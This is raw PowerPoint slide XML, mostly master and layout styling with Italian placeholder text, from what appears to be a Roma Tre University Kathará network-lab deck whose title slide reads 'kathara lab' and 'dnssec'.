            <a:lvl3pPr marL="914423" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371634" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828846" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286057" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743269" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200480" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657691" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare gli stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B7462A-E94B-4E5C-AF83-8E8FA72FC515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ECA9AC3-825F-4AAC-8B76-9EC322D8ACC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30176670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2389554" y="4800600"/>
            <a:ext cx="7315200" cy="566738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto immagine 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389554" y="612775"/>
            <a:ext cx="7315200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457212" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914423" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371634" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828846" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286057" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743269" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200480" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657691" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0"/>
              <a:t>Fare clic sull'icona per inserire un'immagine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto testo 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389554" y="5367338"/>
            <a:ext cx="7315200" cy="804862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457212" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914423" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371634" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828846" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286057" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743269" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200480" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657691" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare gli stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A58AB6D-2A9D-4F16-A910-0B79968AB2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A098BE-69C9-4538-89C8-C00B289910E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19466136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44DAC59-5E6E-45D0-8524-3E061722C9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="116632"/>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it-IT" altLang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F11B519-1465-43CA-9B06-0B1C84B88C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1412777"/>
            <a:ext cx="10972800" cy="4713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it-IT" altLang="it-IT"/>
              <a:t>Fare clic per modificare gli stili del testo dello schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Secondo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Terzo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Quarto livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Quinto livello</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303108" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F6A8ACC-B973-483A-9EBB-30DD75AA7EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9265138" y="6453191"/>
            <a:ext cx="2782277" cy="3333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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303109" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6276769E-8AF7-4AB3-B25A-CA8C5C6A001F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3120295" y="6453191"/>
            <a:ext cx="5951415" cy="3333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dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053844C4-97BD-413F-90CB-BB662D34AACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="144584" y="6453191"/>
            <a:ext cx="2279007"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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Computer Networks Research Group Roma Tre University</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A group of cubes with different colors&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BC26E2-2780-755F-DAB8-E568CC768E79}"/>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23458" y="200174"/>
            <a:ext cx="1264030" cy="852562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="495309783"/>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Lst>
  <p:hf sldNum="0" hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457212" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914423" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371634" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828846" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342908" indent="-342908" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742969" indent="-285757" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143028" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="66CC00"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600240" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="l"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057452" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514663" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971874" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429086" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886297" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:defPPr>
        <a:defRPr lang="it-IT"/>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4" algn="l" defTabSz="914423" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1828846" algn="l" defTabSz="914423" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2286057" algn="l" defTabSz="914423" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2743269"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1" algn="l" defTabSz="91442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89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9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9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60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D52C1193-E72F-9504-F8A2-1C3CD7C9A60A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>kathara lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7269C1AF-3115-5BC8-A826-7DD11551941F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
